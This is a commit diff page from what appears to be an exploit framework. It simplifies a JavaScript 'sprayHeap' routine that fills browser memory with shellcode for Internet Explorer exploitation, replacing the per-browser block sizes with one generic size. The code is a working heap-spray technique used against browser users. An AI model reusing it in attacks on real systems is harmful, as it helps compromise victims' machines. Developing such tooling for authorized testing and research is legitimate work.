One size rules them all.
parent
722e077029
commit
8cb5da0794
|
@ -799,8 +799,6 @@ protected
|
||||||
#
|
#
|
||||||
# The "sprayHeap" JavaScript function supports the following arguments:
|
# The "sprayHeap" JavaScript function supports the following arguments:
|
||||||
# shellcode => The shellcode to spray in JavaScript.
|
# shellcode => The shellcode to spray in JavaScript.
|
||||||
# browser => The type of browser to target for precise block size, such as:
|
|
||||||
# 'ie8', 'ie9', 'ie10', and 'generic'.
|
|
||||||
# objId => Optional. The ID for a <div> HTML tag.
|
# objId => Optional. The ID for a <div> HTML tag.
|
||||||
# offset => Optional. Number of bytes to align the shellcode, default: 0x104
|
# offset => Optional. Number of bytes to align the shellcode, default: 0x104
|
||||||
# heapBlockSize => Optional. Allocation size, default: 0x80000
|
# heapBlockSize => Optional. Allocation size, default: 0x80000
|
||||||
|
@ -822,7 +820,6 @@ protected
|
||||||
function sprayHeap( oArg ) {
|
function sprayHeap( oArg ) {
|
||||||
|
|
||||||
shellcode = oArg.shellcode;
|
shellcode = oArg.shellcode;
|
||||||
browser = oArg.browser;
|
|
||||||
offset = oArg.offset;
|
offset = oArg.offset;
|
||||||
heapBlockSize = oArg.heapBlockSize;
|
heapBlockSize = oArg.heapBlockSize;
|
||||||
maxAllocs = oArg.maxAllocs;
|
maxAllocs = oArg.maxAllocs;
|
||||||
|
@ -832,7 +829,6 @@ protected
|
||||||
if (offset == undefined) { offset = 0x104; }
|
if (offset == undefined) { offset = 0x104; }
|
||||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||||
if (browser == undefined) { browser = 'generic'; }
|
|
||||||
|
|
||||||
if (offset > 0x800) { throw "Bad alignment"; }
|
if (offset > 0x800) { throw "Bad alignment"; }
|
||||||
|
|
||||||
|
@ -855,31 +851,8 @@ protected
|
||||||
for (var i = 0; i < maxAllocs; i++)
|
for (var i = 0; i < maxAllocs; i++)
|
||||||
{
|
{
|
||||||
var obj = document.createElement("button");
|
var obj = document.createElement("button");
|
||||||
switch (browser)
|
|
||||||
{
|
|
||||||
case 'ie8':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-6)/2);
|
|
||||||
div_container.appendChild(obj);
|
|
||||||
break;
|
|
||||||
|
|
||||||
case 'ie9':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||||
div_container.appendChild(obj);
|
div_container.appendChild(obj);
|
||||||
break;
|
|
||||||
|
|
||||||
case 'ie10':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
|
||||||
div_container.appendChild(obj);
|
|
||||||
break;
|
|
||||||
|
|
||||||
case 'generic':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
|
||||||
div_container.appendChild(obj);
|
|
||||||
break;
|
|
||||||
|
|
||||||
default:
|
|
||||||
throw "Invalid argument";
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
|
||||||
|
|
Loading…
Reference in New Issue